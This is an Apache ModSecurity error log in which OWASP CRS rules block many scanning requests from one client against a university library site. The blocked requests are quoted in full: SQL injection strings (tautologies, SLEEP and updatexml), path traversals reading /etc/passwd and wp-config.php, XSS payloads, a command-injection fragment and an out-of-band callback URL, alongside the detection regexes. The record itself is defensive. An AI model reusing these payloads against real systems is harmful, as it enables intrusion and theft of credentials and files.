[Tue Aug 29 11:42:48.508696 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:apiKey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:apiKey: -cjmnbitjmimt14dgn26gfrwhmj8eruoqe.oast.site/test/test/test?key1=val1&dummy="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13SMCo-f0AAAeChYAAAAAw"]
[Tue Aug 29 11:42:50.383841 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAdSZN4AAAAX"]
[Tue Aug 29 11:42:51.372876 2023] [:error] [pid 1918] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAd@4AkAAAAs"]
[Tue Aug 29 11:42:51.384118 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAcvBnwAAAAJ"]
[Tue Aug 29 11:42:52.368879 2023] [:error] [pid 1914] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAd64RwAAAAp"]
[Tue Aug 29 11:42:53.369725 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAdftUUAAAAG"]
[Tue Aug 29 11:42:53.416208 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAd4azEAAAAj"]
[Tue Aug 29 11:42:54.377516 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAQSW3IAAAA0"]
[Tue Aug 29 11:42:54.401003 2023] [:error] [pid 1914] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAd64SEAAAAp"]
[Tue Aug 29 11:42:57.439842 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAc360oAAAAO"]
[Tue Aug 29 11:42:59.696427 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAeZ550AAAAN"]
[Tue Aug 29 11:43:00.408392 2023] [:error] [pid 1960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAeoBAEAAAAT"]
[Tue Aug 29 11:43:00.429198 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAdSZO4AAAAX"]
[Tue Aug 29 11:43:00.440027 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAeChZUAAAAw"]
[Tue Aug 29 11:43:03.438943 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAQSW4QAAAA0"]
[Tue Aug 29 11:43:03.468109 2023] [:error] [pid 1960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAeoBAoAAAAT"]
[Tue Aug 29 11:43:04.399036 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAdb7nIAAAAb"]
[Tue Aug 29 11:43:04.415468 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAdSZPgAAAAX"]
[Tue Aug 29 11:43:06.394484 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAcsLI4AAAAE"]
[Tue Aug 29 11:43:07.422807 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAAd9UOsAAAAr"]
[Tue Aug 29 11:43:08.535287 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAcoNncAAAAF"]
[Tue Aug 29 11:43:08.587203 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAeX1E4AAAAK"]
[Tue Aug 29 11:43:09.405526 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAdftWMAAAAG"]
[Tue Aug 29 11:43:10.412287 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAbo-goAAAAi"]
[Tue Aug 29 11:43:11.421735 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAQSW5AAAAA0"]
[Tue Aug 29 11:43:14.448250 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAdTBEoAAAAY"]
[Tue Aug 29 11:43:15.656236 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAe1edMAAAAB"]
[Tue Aug 29 11:43:18.393537 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAActbQEAAAAH"]
[Tue Aug 29 11:43:18.457580 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAdTBFkAAAAY"]
[Tue Aug 29 11:43:20.428806 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAeChckAAAAw"]
[Tue Aug 29 11:43:21.440212 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAeAW7wAAAAu"]
[Tue Aug 29 11:43:21.461433 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAe1eeMAAAAB"]
[Tue Aug 29 11:43:22.438589 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:token: {{token}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO13asCo-f0AAAexIBEAAAAN"]
